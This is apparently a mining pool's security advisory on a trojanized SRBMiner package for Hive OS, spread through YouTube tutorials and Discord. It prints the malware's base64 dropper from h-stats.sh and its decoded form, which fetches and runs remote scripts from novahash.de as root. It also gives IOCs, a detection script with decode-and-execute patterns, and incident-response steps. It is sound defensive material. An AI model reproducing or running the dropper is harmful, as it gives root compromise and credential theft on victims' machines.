Trojanized SRBMiner 3.2.5 Package in the Wild
What miners need to know, in the order they’ll want to know it
A fake SRBMiner-Multi tarball is being distributed from miningrepositories.blog and mirrored on the GitLab repository gitlab.com/hiveos-custom/m, promoted via YouTube tutorials from the “Argenminer” channel with setup instructions staged on anotepad.com. The payload drops a root-level stage-2 from novahash.de via the Hive OS stats script every ten seconds or so, which is really quite rude.
The Argenminer YouTube channel is gone.
Following the coordinated takedown requests and notices we filed with YouTube, the platform has removed the entire Argenminer channel — every tutorial video that was promoting the trojanized package, including the ones linked from this advisory (video IDs Id3nMIt18EE for the Vertcoin tutorial and xiA81jvYFJs for the LuckyPepe tutorial), is now offline.
The campaign’s primary on-ramp for new victims has been cut off. The malware itself, the GitLab mirror, the anotepad note, and novahash.de may still exist somewhere in the wild — and any rig already compromised remains compromised, so the original guidance below still applies. But the YouTube channel that was the public face of this campaign no longer exists, and the actor’s most effective recruiting funnel is dead.
Do not try to clean this by hand. Reformat the rig.
The h-stats.sh script in this tarball runs as root on every Hive OS stats poll — roughly every ten seconds, for as long as the rig is powered on. It fetches and executes a second-stage payload, then deletes the visible artefacts. If you delete files by hand, it simply drops them again on the next poll. Cheerful little thing, isn’t it.
At that privilege level you cannot trust the box. You must reimage the rig from a clean OS, reinstall from scratch, and rotate every credential that ever touched it — pool accounts and API keys, SSH keys, wallet seed phrases stored on disk, saved browser sessions, the lot. Also audit any other machines that share credentials with the affected rig, because lateral movement is the sort of thing this class of attacker very much enjoys.
We appreciate that “reformat the rig” is not what anyone wants to hear on a Thursday. It is, however, the only correct answer.
Self-identification: if you set up a rig by following a YouTube tutorial from the channel “Argenminer” (youtube.com/@Argenminer) for mining C64Chain, Qubit (QTC), Vertcoin (VTC), or LuckyPepe (LPEPE) on or after 16 April 2026; if your flightsheet install_url points to miningrepositories.blog or gitlab.com/hiveos-custom/m; if you followed instructions from an anotepad.com note (e.g. anotepad.com/notes/a7ycensj); or if someone dropped any of those links in one of those coins’ Discords — that is the delivery path for this tarball. Treat the rig as compromised and follow the steps above.
Someone is shipping a doctored SRBMiner-Multi 3.2.5 package from miningrepositories.blog and a GitLab mirror at gitlab.com/hiveos-custom/m. The campaign is promoted through YouTube tutorials by the channel “Argenminer”, which stages setup instructions (wallet, pool, install_url) on anotepad.com notes — e.g. anotepad.com/notes/a7ycensj — and has targeted C64Chain, Qubit (QTC), Vertcoin (VTC) and LuckyPepe (LPEPE) so far. The miner binary appears legitimate and acts as cover; the malicious bit is hidden inside h-stats.sh as a base64-encoded block that, on every Hive OS stats poll, downloads two “image” files (really ZIPs) from novahash.de, extracts them to /etc/, runs the shell scripts inside as root, and tidies up after itself. If you installed this tarball on any rig: reformat. Block novahash.de, miningrepositories.blog, and gitlab.com/hiveos-custom/m at your firewall. Only ever download SRBMiner from github.com/doktor83/SRBMiner-Multi/releases and verify the SHA256 against the published value.
IOCs — for the people who just want to grep
Everything a defender needs in one block. Fuller detail is further down, but if you’re here to check your fleet, start here.
- Distribution domain: miningrepositories.blog
- Distribution mirror: gitlab.com/hiveos-custom/m (raw-content paths under this repo)
- Stage-2 host: novahash.de
- Stage-2 URLs: https://novahash.de/fileslab/recuaikaan.png and https://novahash.de/fileslab/mqtato-fla.jpg
- Tarball URLs: https://miningrepositories.blog/srbminer-3.2.5.tar.gz and https://gitlab.com/hiveos-custom/m/-/raw/main/srbminer-3.2.5.tar.gz
- Staging note: https://anotepad.com/notes/a7ycensj (observed last updated 2026-04-19; contents may be rotated)
- YouTube channel: https://www.youtube.com/@Argenminer
- Known video: https://www.youtube.com/watch?v=Id3nMIt18EE (“VERTCOIN ! Top GPU Mining | HIVEOS Easy Flight Sheet Tutorial Pool & Wallet.”)
- Dropper artefacts (deleted after use): /etc/recuaikaan.png, /etc/recuaikaan.zip, /etc/recuaikaan.sh, /etc/mqtato-fla.jpg, /etc/mqtato-fla.zip, /etc/mqtato-fla.sh
- srbminer_bin SHA256: 9d69228bce9ad3f1cde0f7fa0141e7588922227ee67b3c3f12788a0429909d06
- srbminer_bin BuildID: fc2487ec223c91039748e53c08328af91260cd8c
Distribution vector
The package is being offered from two distinct, attacker-controlled distribution points — with at least one additional staging layer on a public pastebin-style site. All three host the same trojanized srbminer-3.2.5.tar.gz, and all three are chosen to look like generic community-run resources to an operator searching for miner binaries:
- Original distribution blog: https://miningrepositories.blog/srbminer-3.2.5.tar.gz — a domain name chosen to sound like a generic mining-tools repository. Not a known or legitimate distribution channel for SRBMiner.
- GitLab mirror (observed 2026-04-19): https://gitlab.com/hiveos-custom/m/-/raw/main/srbminer-3.2.5.tar.gz — abuses GitLab’s trusted SaaS hostname to lend the download an air of legitimacy. The repo is a throwaway account named to look like an official Hive OS custom-miner repository (it isn’t). The raw-content URL is what appears inside the flightsheet JSON that victims paste into Hive OS.
- Setup-instructions staging: https://anotepad.com/notes/a7ycensj — a public anonymous notepad page hosting a ready-made Hive OS flightsheet JSON (miner: custom, miner_alt: srbminer), the attacker’s CoinEx wallet ID, and an install_url pointing at the GitLab mirror above. The note was last updated 2026-04-19 03:48 UTC — i.e. this is a live and actively maintained campaign, not a snapshot.
- Domain / host choice (miningrepositories.blog, gitlab.com/hiveos-custom/m) sounds plausible, but doesn’t match any known upstream project or community repository. “Hiveos-custom” in particular is a user account, not an official Hive OS namespace — and a legitimate custom-miner repo would never rename itself to the single letter “m”.
- Version label 3.2.5 is conspicuously outdated — the genuine SRBMiner-Multi is well beyond this. “Stale but real-sounding” is a classic pick for a trojanised package because it doesn’t invite questions about source.
- Setup instructions hosted on an anonymous public-pastebin page rather than a README, a project wiki, or a pool’s Getting Started page. That’s an anti-trust signal: the attacker gets to rotate wallet IDs, pool URLs and install_urls without anyone noticing because no-one reviews a pastebin.
- Flightsheet uses a real, legitimate third-party pool URL (at time of writing, vertcoin.cedric-crispin.com:3334) to further cover the operation — the victim’s rig actually mines valid shares to an attacker-controlled exchange deposit address (CoinEx wal_id: 11032492). If you are the operator of a pool whose hostname appears in this flightsheet, you are being used as a prop and you should consider naming-and-shaming the note.
- The canonical release channel, with published SHA256s, is github.com/doktor83/SRBMiner-Multi/releases. Anything claiming to be SRBMiner from anywhere else deserves the same scepticism you’d apply to a stranger offering you a sandwich at a train station.
Delivery: YouTube tutorials and Discord seeding (observed)
The trojanized tarball isn’t sitting on a random domain waiting for someone to stumble onto it. It’s being actively promoted through channels miners trust, and the promotion layer is larger and more deliberate than the original 2026-04-17 advisory described. As of 19 April 2026 the picture is:
- YouTube channel: “Argenminer” (youtube.com/@Argenminer). Multiple setup tutorials still live at time of writing, each one walking viewers through Hive OS flightsheet creation for a different small coin. Every video links — either in its description or in a pinned/author comment — to an anotepad.com note that contains the complete, copy-pastable flightsheet JSON. The flightsheet JSON’s install_url field is what drops the trojanized tarball onto the viewer’s rig. Confirmed target coins so far: C64Chain, Qubit (QTC), Vertcoin (VTC), and LuckyPepe (LPEPE).
- Known tutorial videos:
  - VTC: youtube.com/watch?v=Id3nMIt18EE — “VERTCOIN ! Top GPU Mining | HIVEOS Easy Flight Sheet Tutorial Pool & Wallet.”
  - LPEPE: youtube.com/watch?v=xiA81jvYFJs — “LUCKYPEPE! New GPU/CPU Mining Coin! HIVEOS Easy Flight Sheet Tutorial Pool & Wallet!”
- Anotepad staging note: https://anotepad.com/notes/a7ycensj (VTC) is the one we’ve captured; additional per-coin notes almost certainly exist for C64Chain, QTC and LPEPE. The VTC note contains a ready-made flightsheet with the legitimate pool vertcoin.cedric-crispin.com:3334 in the url field, a wallet ID (wal_id: 11032492) in the wal_id field, and install_url: https://gitlab.com/hiveos-custom/m/-/raw/main/srbminer-3.2.5.tar.gz. Note contents can be rotated at any time; the URL itself is the stable IOC.
- Discord seeding. The same tarball and/or the anotepad link have been posted in the mining channels of the C64Chain Discord, the Qubit (QTC) Discord, and — now that the Argenminer VTC and LPEPE videos are up — likely the Vertcoin and LuckyPepe communities as well. Framed as a helper for new miners getting started.
Each Argenminer flightsheet points at a real, working third-party pool so the victim’s rig actually appears to mine (captured examples include vertcoin.cedric-crispin.com:3334 for VTC, and Suprnova’s own lpepe.suprnova.cc in the LPEPE tutorial). The pool, the worker name, and the wallet ID in the flightsheet are all cover — the attacker’s monetisation is root on the victim’s rig, not the small trickle of mining fees. If you operate a pool whose hostname appears in a flightsheet linked from an Argenminer video or anotepad note, you are not “infected”, but you are being used as the legitimacy layer for someone else’s malware campaign. Consider publicly disavowing the flightsheet and pointing your users at this advisory. (Suprnova has done so for the LPEPE tutorial targeting our pool; see the LPEPE video above.)
What this tells us about the attacker’s playbook
This is social engineering, not a drive-by download. Each step of the attacker’s process is deliberately chosen to lower the target’s guard:
- Pick small coins with active Discord communities and a steady trickle of newcomers. C64Chain, QTC, a longer-running niche coin like Vertcoin, or a brand-new micro-cap coin like LuckyPepe (LPEPE) are exactly the sort of targets where a new miner lands in the Discord, asks how to get started, and gratefully accepts the first link someone helpful hands them. Bigger coins attract more scrutiny; smaller ones attract more trust; brand-new ones attract almost no scrutiny at all.
- Produce a working tutorial. The YouTube videos demonstrate rigs that actually mine, because the miner binary in the tarball is a real working miner (cover) and the flightsheet’s url field points at a real, working, third-party pool. Visual proof is persuasive — a video showing accepted shares rolling in is worth a thousand “trust me”s.
- Abuse trusted hosting. Point the install_url at a GitLab raw-content URL (gitlab.com/hiveos-custom/m), and stage the flightsheet JSON on a GitLab-adjacent, pastebin-style service (anotepad.com). The download host is Google-tier infrastructure; the flightsheet host is a URL shortener in all but name. Neither is going to get flagged by a curious newcomer.
- Accumulate reputation first, weaponise second. Once the video exists, more videos join it on the same channel, and a few comments say “this worked, thanks!”, the link becomes self-reinforcing — every new viewer sees social proof before they see a reason to be suspicious.
- Seed into new-miner channels. Drop the anotepad or tarball link into Discord channels where newcomers ask for setup help. The payload runs on first stats poll; the attacker doesn’t need the victim to do anything beyond “follow the tutorial.”
- Count on community moderators not auditing tarballs or flightsheets. Almost no coin Discord has the resources to reverse-engineer every “helpful” tarball posted to its mining channel, or to compare the wal_id in a shared flightsheet against the operator who posted it. A friendly-looking user with a YouTube channel looks like a community member, not a threat.
- Rotate artefacts, keep the channel. The anotepad note can be edited at any time — wallet ID, pool URL, install_url can all change in seconds. The YouTube channel is the durable asset; the anotepad link inside each video’s description is the steering mechanism. Takedowns of individual tarball hosts don’t break the campaign if the channel is still up.
A working YouTube tutorial and a friendly Discord post are not trust signals. The attacker’s video almost certainly demonstrates a rig that mines correctly — because it does. The harm is inside h-stats.sh, running as root, on the rig the viewer just lovingly configured. If you are a new miner: only trust miner downloads from the official project repository for that miner, and verify the SHA256 every single time. If you run a coin Discord: consider a pinned “do not trust tarballs posted here unless they come from the official project” notice at the top of the mining channel.
If you are part of the C64Chain, Qubit (QTC), Vertcoin (VTC), or LuckyPepe (LPEPE) community and set up a rig from any of the Argenminer tutorials, or linked a friend to one — please share this advisory with that community, and treat any rig built from one of those guides as compromised.
What’s in the tarball
The archive is a full Hive OS custom-miner integration, with a Minerstat integration (mmp-*) shoved in alongside for good measure. Authentic distributions ship one or the other — not both — so the bundling itself is a giveaway.
| File | Size | Status |
|---|---|---|
| h-manifest.conf | 616 B | Clean (cosmetic tampering only) |
| h-run.sh | 764 B | Clean (cosmetic tampering only) |
| h-config.sh | 205 B | Clean |
| h-stats.sh | 8,646 B | MALICIOUS — contains dropper |
| mmp-stats.sh | 4,116 B | Clean |
| mmp-external.conf | 63 B | Clean (version mismatch noted) |
| srbminer_bin | 20,309,184 B (~20 MB) | Likely genuine/near-genuine SRBMiner (cover) |
Telltale signs of repackaging
None of the following are malicious in themselves — they’re the kind of diagnostic detail that tells you the package isn’t from where it claims:
- Spanish-language comments in h-run.sh and h-manifest.conf — e.g. “Verificar si ya está corriendo”, “Cargar manifest”, “Ejecutar el binario con parámetros”, “Nombre del miner”, “Ruta al archivo de configuración”. Legitimate upstream SRBMiner integrations are in English.
- Internal version mismatch. h-manifest.conf declares CUSTOM_VERSION=3.2.5; mmp-external.conf declares EXTERNAL_VERSION="2.6.8-custom". Authentic packages are internally consistent. This one couldn’t quite get its story straight.
- Hive and Minerstat integrations bundled together. Upstream ships one or the other, not both.
- Unstripped binary. Upstream release binaries are stripped to reduce size and frustrate analysis. This one isn’t — strong indication the attacker built from source rather than repackaging the official release.
The payload: h-stats.sh
Most of h-stats.sh is, annoyingly, a perfectly functional Hive OS stats parser. It queries the miner’s HTTP API on 127.0.0.1:$MINER_API_PORT, parses hashrate, shares, temperatures, and fan speeds for GPU and CPU workers, handles single- and dual-algorithm mining, and emits valid stats JSON back to the Hive agent. This is not incidental — it’s essential cover. If the script were broken, Hive would show the rig as offline and the operator would investigate within minutes.
Appended after the legitimate stats logic, and before the final fallback assignments, is this block:
```bash
p="bm9odXAgc3VkbyB3Z2V0IC1xIGh0dHBzOi8vbm92YWhhc2guZGUvZmlsZXNsYWIvcmVjdWFpa2Fhbi5wbmcg
LU8gL2V0Yy9yZWN1YWlrYWFuLnppcCAmJiBzdWRvIHVuemlwIC1xIC1vIC9ldGMvcmVjdWFpa2Fhbi56aXAgLWQg
L2V0YyAmJiBzdWRvIGJhc2ggL2V0Yy9yZWN1YWlrYWFuLnNoIDsgc3VkbyB3Z2V0IC1xIGh0dHBzOi8vbm92YWhh
c2guZGUvZmlsZXNsYWIvbXF0YXRvLWZsYS5qcGcgLU8gL2V0Yy9tcXRhdG8tZmxhLnppcCAmJiB1bnppcCAtcSAt
byAvZXRjL21xdGF0by1mbGEuemlwIC1kIC9ldGMgJiYgYmFzaCAvZXRjL21xdGF0by1mbGEuc2ggOyBybSAvZXRj
L21xdGF0by1mbGEuemlwIDsgcm0gL2V0Yy9tcXRhdG8tZmxhLnNoIDsgcm0gL2V0Yy9yZWN1YWlrYWFuLnNoIDsg
cm0gL2V0Yy9yZWN1YWlrYWFuLnppcCA+IC9kZXYvbnVsbCAyPiYxICY="
nohup sh -c "$(echo "$p" | base64 -d)" > /dev/null 2>&1 &
```
Decoded, the base64 payload is:
```bash
nohup sudo wget -q https://novahash.de/fileslab/recuaikaan.png -O /etc/recuaikaan.zip \
&& sudo unzip -q -o /etc/recuaikaan.zip -d /etc \
&& sudo bash /etc/recuaikaan.sh ; \
sudo wget -q https://novahash.de/fileslab/mqtato-fla.jpg -O /etc/mqtato-fla.zip \
&& unzip -q -o /etc/mqtato-fla.zip -d /etc \
&& bash /etc/mqtato-fla.sh ; \
rm /etc/mqtato-fla.zip ; rm /etc/mqtato-fla.sh ; \
rm /etc/recuaikaan.sh ; rm /etc/recuaikaan.zip > /dev/null 2>&1 &
```
Execution behaviour, step by step
- Two “image” files (.png and .jpg) are fetched via wget from novahash.de. The image extensions are camouflage: the actual content is ZIP archives. This is a familiar trick for slipping past naive egress filters that inspect script and archive traffic but wave images through.
- Each archive is written to /etc/, renamed to .zip, and extracted in place with `unzip -o` (overwrite).
- Each archive contains a shell script (recuaikaan.sh, mqtato-fla.sh) which is then executed — the first explicitly with sudo, the second relying on the already-root context in which the Hive agent runs.
- All four artefacts (both .zips and both .shs) are then deleted from /etc/. This sanitises the dropper’s footprint: a forensic look at /etc/ afterwards finds nothing, while whatever the stage-2 scripts installed elsewhere remains resident.
- The whole chain runs in the background via `nohup … &`, so the legitimate stats output upstream is neither blocked nor delayed. Hive continues to see a healthy rig.
Why h-stats.sh is the perfect injection site
- Hive OS invokes h-stats.sh on a short, fixed interval — typically every ten seconds or so — to poll the miner for stats.
- The Hive agent runs as root. The user account has passwordless sudo. Every sudo in the payload therefore succeeds silently, with no prompt and no authentication log entry.
- The script runs for the entire lifetime of the rig. Power on, network up, miner running, indefinitely.
What that gives the attacker:
- Automatic execution on install. No user action required.
- Root privilege with no social-engineering prompt.
- Retry on failure. If novahash.de is briefly unreachable, the dropper simply tries again ten seconds later.
- Self-healing infection. If you notice and manually delete stage-2 components, they’ll be re-dropped on the next poll for as long as h-stats.sh remains on disk. This is why hand-cleaning does not work.
- Silence. `>/dev/null 2>&1 &` detaches from the terminal and swallows all output. Nothing shows up in Hive’s stats view; nothing appears in the user’s face.
It’s as if someone slipped a note into your front-door letterbox that reads “please leave the back door unlocked”, and then posted the same note every ten seconds, forever, while also tidying up the previous ones. You cannot out-tidy them. You have to change the locks.
The cover miner: srbminer_bin
The binary included in the package looks like a legitimate or near-legitimate SRBMiner-Multi build. Its job, from the attacker’s point of view, is to be uneventful:
- File: ELF 64-bit LSB shared object, x86-64, dynamically linked.
- Size: 20,309,184 bytes (~20 MB).
- SHA256: 9d69228bce9ad3f1cde0f7fa0141e7588922227ee67b3c3f12788a0429909d06
- BuildID: fc2487ec223c91039748e53c08328af91260cd8c
- Stripped: No (atypical for an upstream release — those are stripped).
- Embedded build paths: reference /home/doktor/VSCode/SRBMiner-Multi/Libs/{clew,libmicrohttpd,libressl,hwloc}/linux, which are the real SRBMiner author’s (doktor83) environment paths. Consistent with a build from genuine or slightly modified source.
- Embedded URLs: none found. No references to novahash.de or the dropper filenames.
The attacker’s plan depends on the miner producing plausible hashrate and share output so that Hive and Minerstat dashboards look normal and the operator has no reason to investigate. All observed malicious functionality is in h-stats.sh; the binary is not the attack vector.
Compare the binary’s SHA256 against known-good hashes from github.com/doktor83/SRBMiner-Multi/releases, or submit it to VirusTotal. A mismatch with any published SRBMiner hash is grounds to treat the binary itself as suspect, regardless of anything written here.
Full Indicators of Compromise
Network
- Stage-2 C2 domain: novahash.de — block at firewall and DNS
  - https://novahash.de/fileslab/recuaikaan.png
  - https://novahash.de/fileslab/mqtato-fla.jpg
- Distribution domain (original): miningrepositories.blog
- Distribution mirror (GitLab): gitlab.com/hiveos-custom/m — specifically https://gitlab.com/hiveos-custom/m/-/raw/main/srbminer-3.2.5.tar.gz
- Attacker-controlled setup-instructions page: https://anotepad.com/notes/a7ycensj (contents rotate; the URL is the stable IOC)
Promotion / social-engineering channel
- YouTube channel: https://www.youtube.com/@Argenminer — multiple live tutorial videos for different small coins, each pointing at a per-coin anotepad staging note and, via it, at the trojanized tarball
- Known video (VTC): https://www.youtube.com/watch?v=Id3nMIt18EE — “VERTCOIN ! Top GPU Mining | HIVEOS Easy Flight Sheet Tutorial Pool & Wallet.”
- Known video (LPEPE): https://www.youtube.com/watch?v=xiA81jvYFJs — “LUCKYPEPE! New GPU/CPU Mining Coin! HIVEOS Easy Flight Sheet Tutorial Pool & Wallet!”
- Target coin communities so far: C64Chain, Qubit (QTC), Vertcoin (VTC), LuckyPepe (LPEPE)
- Wallet ID in captured VTC flightsheet: CoinEx, wal_id: 11032492 — treat as cover/prop, not as an attacker financial IOC: the malware is a root-level dropper, not a cryptojacker, and the mining config’s wallet/pool are theatre
Filesystem (dropper artefacts)
Deleted by the dropper after execution — absence is not exonerating:
/etc/recuaikaan.png
/etc/recuaikaan.zip
/etc/recuaikaan.sh
/etc/mqtato-fla.jpg
/etc/mqtato-fla.zip
/etc/mqtato-fla.sh
File hashes
- srbminer_bin SHA256: 9d69228bce9ad3f1cde0f7fa0141e7588922227ee67b3c3f12788a0429909d06
- srbminer_bin BuildID: fc2487ec223c91039748e53c08328af91260cd8c
Process and behavioural signatures
- wget calls to novahash.de from the Hive user account or root
- `nohup sh -c` invocations spawned from h-stats.sh
- `sudo bash /etc/*.sh` entries in sudo logs (if auditing is enabled)
- Unusual .zip, .png, or .jpg files appearing in /etc/ at any point
Package-level red flags (useful for finding other trojanised packages)
- Spanish-language comments in Hive or Minerstat integration scripts that upstream ships in English
- Internal version mismatches between manifest files
- Unstripped release binaries
- Hive and Minerstat integrations bundled in a single package
- Long base64 strings in any h-*.sh or mmp-*.sh script
- `base64 -d | sh`, `base64 -d | bash`, `xxd -r -p | sh`, or similar decode-and-execute pipelines anywhere in stats or run scripts
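To make those red flags greppable across a fleet, here is an added audit script (written for this advisory; not Suprnova’s or SRBMiner’s own tooling) that walks an unpacked custom-miner directory and reports each signal listed above. ALLOWED_HOSTS is a hypothetical allowlist you set to your own pool hostnames; the non-English-comment check is a heuristic built from the words seen in this package.

```bash
#!/usr/bin/env bash
# audit_miner_pkg.sh: report the package-level red flags described above for
# an unpacked custom-miner directory (Hive OS h-*.sh, Minerstat mmp-*.sh).
# Added example for this advisory, not Suprnova's or SRBMiner's own tooling.
# Usage: audit_miner_pkg /path/to/unpacked/tarball   (exit 0 clean, 1 flagged)

# Hosts a package's scripts may legitimately contact. Hypothetical default;
# set ALLOWED_HOSTS to your own pool hostnames before running.
: "${ALLOWED_HOSTS:=github.com api.github.com}"

AUDIT_FLAGS=0
flag() { echo "FLAG: $1"; AUDIT_FLAGS=$((AUDIT_FLAGS + 1)); }

# Comments in a language upstream does not ship in. Heuristic built from the
# words seen in this package; extend for other campaigns.
NON_ENGLISH_RE='^[[:space:]]*#.*(Verificar|Cargar|Ejecutar|Ruta|Nombre|archivo|binario)'

# Checks that apply to each shell script in the package.
audit_script() {
  f="$1"
  # decode-and-execute: "base64 -d | sh", "xxd -r -p | bash", sh -c "$(... | base64 -d)"
  if grep -Eq '(base64[[:space:]]+(-d|--decode)|xxd[[:space:]]+-r[[:space:]]+-p)[^|]*\|[[:space:]]*(sudo[[:space:]]+)?(sh|bash)([[:space:]]|$)' "$f" \
  || grep -Eq '(sh|bash)[[:space:]]+-c[[:space:]]+"?\$\([^)]*base64[[:space:]]+(-d|--decode)' "$f"; then
    flag "$f: decode-and-execute pipeline"
  fi
  # A stats or run wrapper has no honest reason to embed a long base64 blob.
  grep -Eq '[A-Za-z0-9+/]{60,}={0,2}' "$f" && flag "$f: long base64-like string"
  # Network references to anything other than the miner's local API or the allowlist.
  for h in $(grep -Eo 'https?://[^/"'"'"'[:space:]]+' "$f" | sed -E 's#^https?://##' | sort -u); do
    case " $ALLOWED_HOSTS " in
      *" $h "*) ;;                      # explicitly allowed
      *) case "$h" in
           127.0.0.1*|localhost*) ;;    # h-stats.sh legitimately polls the local miner API
           *) flag "$f: network reference to $h" ;;
         esac ;;
    esac
  done
  # Writes into, or execution from, system paths a miner wrapper should never touch.
  grep -Eq '(-O|-d|>|bash|sh)[[:space:]]+/(etc|usr/local)/' "$f" \
    && flag "$f: writes to or runs from /etc or /usr/local"
  grep -Eq "$NON_ENGLISH_RE" "$f" && flag "$f: non-English comments"
  return 0
}

# Whole-package checks plus the per-script checks. Returns 0 only if nothing was flagged.
audit_miner_pkg() {
  dir="$1"
  AUDIT_FLAGS=0
  for f in "$dir"/h-*.sh "$dir"/mmp-*.sh; do
    [ -f "$f" ] && audit_script "$f"
  done
  # Hive and Minerstat integrations in one package, and their declared versions disagreeing.
  if [ -f "$dir/h-manifest.conf" ] && [ -f "$dir/mmp-external.conf" ]; then
    flag "Hive (h-manifest.conf) and Minerstat (mmp-external.conf) integrations bundled together"
    hive_ver=$(sed -nE 's/^CUSTOM_VERSION="?([^"]*)"?.*/\1/p' "$dir/h-manifest.conf")
    mst_ver=$(sed -nE 's/^EXTERNAL_VERSION="?([^"]*)"?.*/\1/p' "$dir/mmp-external.conf")
    [ -n "$hive_ver" ] && [ -n "$mst_ver" ] && [ "$hive_ver" != "$mst_ver" ] \
      && flag "version mismatch: CUSTOM_VERSION=$hive_ver vs EXTERNAL_VERSION=$mst_ver"
  fi
  # Unstripped ELF binaries (upstream releases are stripped). Skipped if file(1) is absent.
  if command -v file >/dev/null 2>&1; then
    for b in "$dir"/*; do
      [ -f "$b" ] || continue
      file "$b" | grep -q 'ELF.*not stripped' && flag "$b: unstripped ELF binary"
    done
  fi
  echo "$AUDIT_FLAGS red flag(s) in $dir"
  [ "$AUDIT_FLAGS" -eq 0 ]
}

# When run directly, audit the directory given on the command line.
if [ $# -gt 0 ]; then audit_miner_pkg "$1"; fi
```

Run it against the extracted tarball before the flightsheet ever points at it; a non-zero exit means read the flagged lines before deciding anything.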
Incident Response Checklist
If you installed this package on any rig or server, work through these in order. Be slightly grumpy about it. That’s the correct emotional posture.
Isolate
Disconnect the affected rig from the network immediately. Do not shut it down first — memory state may be useful, and some persistence mechanisms trigger on boot.
Block C2 everywhere
Add novahash.de to DNS sinkhole and firewall deny lists across the whole network, not just the affected rig. Lateral movement is on the table, so assume other machines may have been poked at.
Snapshot for forensics (if you care)
If you’ve the patience, image the disk before remediation, and capture memory if you have tools for it. If you don’t — fair enough, skip to remediation.
Check dropper artefacts
```bash
ls -la /etc/recuaikaan* /etc/mqtato* 2>/dev/null
```
Check userland rootkit indicators
```bash
cat /etc/ld.so.preload # should be empty or not exist
```
Look for recently modified files
```bash
find /etc /usr/local/bin /usr/local/sbin /root /tmp /var/tmp /dev/shm \
  -mtime -30 -type f -ls 2>/dev/null
```
Audit persistence mechanisms
```bash
crontab -l
for u in $(cut -f1 -d: /etc/passwd); do crontab -u "$u" -l 2>/dev/null; done
ls -la /etc/cron.* /etc/cron.d/ /var/spool/cron/
systemctl list-unit-files --state=enabled
systemctl list-timers --all
```
Hunt SSH backdoors
```bash
find / -name "authorized_keys" 2>/dev/null -exec ls -la {} \; -exec cat {} \;
grep -E '^(PermitRootLogin|PasswordAuthentication|AuthorizedKeysFile)' /etc/ssh/sshd_config
```
Check outbound connections
```bash
ss -tnp | grep -E '(srbminer|sh|wget|curl)'
```
Check for second-stage persistence and exfil
This isn’t a cryptojacker — the attacker is after root-level persistence and whatever that lets them do next: scan the disk for wallet seed files and keystores, lift pool credentials and SSH keys out of config files, pivot to other machines on the LAN, enrol the rig in a botnet or residential-proxy pool. Check for signs of post-compromise activity: hidden binaries in unusual paths, modified shell RC files (~/.bashrc, ~/.profile, /etc/profile.d/), new kernel modules, unexpected outbound connections to hosts other than your pool, and any process not launched by your own miner setup running as root.
Run rootkit scanners
```bash
chkrootkit
rkhunter --check --skip-keypress
```
Review sudo logs
```bash
grep -E 'wget|bash /etc' /var/log/auth.log /var/log/secure 2>/dev/null
```
If any indicator hits — reimage. Full stop.
Userland code executing as root on a short interval cannot be reliably cleaned by hand. Reinstall the operating system on the rig, rotate every credential that touched the machine (pool accounts, SSH keys, wallet seeds stored anywhere on disk), and audit any other devices that share credentials with the affected rig. Treat this as a chance to tidy up some things you’ve been meaning to tidy up anyway.
Hardening: how not to end up here
A few habits that would have prevented this outright. None of them are novel; all of them are boring; boring is the vibe we’re going for.
Download miners only from the official project repository. For SRBMiner specifically, that’s github.com/doktor83/SRBMiner-Multi/releases. For any other miner, find the official project page on GitHub — usually linked from the pool’s Getting Started page. Everything else is a guess.
Official miner releases publish checksums. sha256sum the download and compare. It takes eight seconds, which is substantially less than the time it takes to reimage a rig.
Don’t install tarballs or flightsheets handed to you in a Discord, a video description or a pastebin note unless they come from a known, trusted source in the community. Stats-integration wrappers are a favourite injection site precisely because most operators never read them. That is the entire reason we are here.
Spend 30 seconds with less h-stats.sh before pointing a flight sheet at a new custom miner. Long encoded strings, network calls to unfamiliar domains, writes to /etc/ or /usr/local/ — these are all red flags and any one of them is worth pausing for.
Rigs don’t need to reach arbitrary domains. Allowlist the pool IPs and block everything else. A properly firewalled rig cannot be dropper-staged even if a malicious script manages to run, because it has nowhere to fetch stage-2 from.
A rig making HTTPS requests to anything outside your pool is suspicious by default. This is not paranoia — this is the lowest-cost detection you have.
On Hive OS, the Hive agent runs as root and the user account has passwordless sudo. That means any script the Hive agent invokes effectively has root. Be aware of it. If your framework supports unprivileged mining users, use them.
A note from Suprnova
Pool operators and their miners are a target-rich population for this sort of attack. A trojanized miner on a rig isn’t cryptojacking — it’s worse. Once the dropper has root, it can scan the disk for wallet seed files and backed-up keystores, lift pool credentials and SSH keys out of config files, harvest browser sessions, enrol the rig in a botnet or residential-proxy pool, and pivot into your broader infrastructure. The mining-shaped exterior is just a lid on the box; the attacker’s actual interest is everything inside. Our users are, on average, more technical, more valuable, and more specifically targeted than the general population of “people who download things”, and that attention is not, on balance, a compliment.
If you come across a suspicious miner download, an unusual tarball, or a Discord or Telegram DM pushing “custom” or “patched” miner binaries — please forward it to admin@suprnova.cc or drop it in our Discord. We’ll take a look, update this advisory as needed, and warn the rest of the community. Belt, braces, and a bit of shared paranoia — the three pillars of a happy mining rig.
The Bottom Line
The tarball at https://miningrepositories.blog/srbminer-3.2.5.tar.gz and the identical copy at https://gitlab.com/hiveos-custom/m/-/raw/main/srbminer-3.2.5.tar.gz are trojanized. The miner binary is cover; the real payload lives in h-stats.sh and reaches out to novahash.de every ten seconds, as root, for as long as the rig is running.
The YouTube channel @Argenminer is the promotion layer. Its videos walk viewers through Hive OS flightsheet setup and link — via an anotepad.com note — to the trojanized install_url. If you followed an Argenminer tutorial for C64Chain, Qubit (QTC), Vertcoin (VTC), or LuckyPepe (LPEPE) on or after 16 April 2026, treat the rig as compromised.
If you installed this package on any machine, you must reformat it. Not “investigate it”. Not “clean it up”. Reformat. Rotate every credential that touched the box. Audit anything that shared credentials with it. There is no middle option that is also correct.
Block novahash.de, miningrepositories.blog, and the raw-content paths under gitlab.com/hiveos-custom/m. At DNS and at your egress firewall. Everywhere, not just on the affected rig. Treat the anotepad.com note at anotepad.com/notes/a7ycensj as a known attacker-controlled page even if its contents change.
Only download miners from verified upstream sources, and verify the SHA256 every time. The official SRBMiner releases live at github.com/doktor83/SRBMiner-Multi/releases. Anywhere else pretending to offer SRBMiner — a mining-tools blog, a random GitLab user account, a YouTube tutorial’s pastebin link — is, at best, untrusted.